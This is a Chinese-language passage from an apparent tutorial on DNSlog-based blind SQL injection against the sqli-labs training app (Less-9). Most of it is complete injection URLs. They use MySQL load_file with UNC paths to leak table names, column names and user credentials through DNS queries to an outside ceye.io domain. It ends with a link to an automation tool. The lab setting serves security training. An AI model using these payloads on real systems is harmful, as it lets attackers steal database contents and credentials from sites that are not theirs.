原因(该方法只适合在windows服务器上)
案例:
根据数据库查表:
http://192.168.239.146/sqli-labs-master/Less-9/?id=1' and load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.hzaskx.ceye.io\\abc'))--+
#### 根据表查字段
http://192.168.239.146/sqli-labs-master/Less-9/?id=1' and load_file(concat('\\\\',(select column_name from information_schema.columns where table_name='users' limit 0,1),'.hzaskx.ceye.io\\abc'))--+
#### 最后查询数据内容:
```powershell
http://192.168.239.146/sqli-labs-master/Less-9/?id=1' and load_file(concat('\\\\',(select concat_ws('A',username,password) from security.users limit 0,1),'.hzaskx.ceye.io\\abc'))--+
或者:
http://192.168.239.146/sqli-labs-master/Less-9/?id=1' and load_file(concat('\\\\',(select hex(concat_ws('-',username,password)) from security.users limit 0,1),'.hzaskx.ceye.io\\abc'))--+
使用代码进行DNSlog注入的代码地址:https://github.com/ADOOO/DnslogSqlinj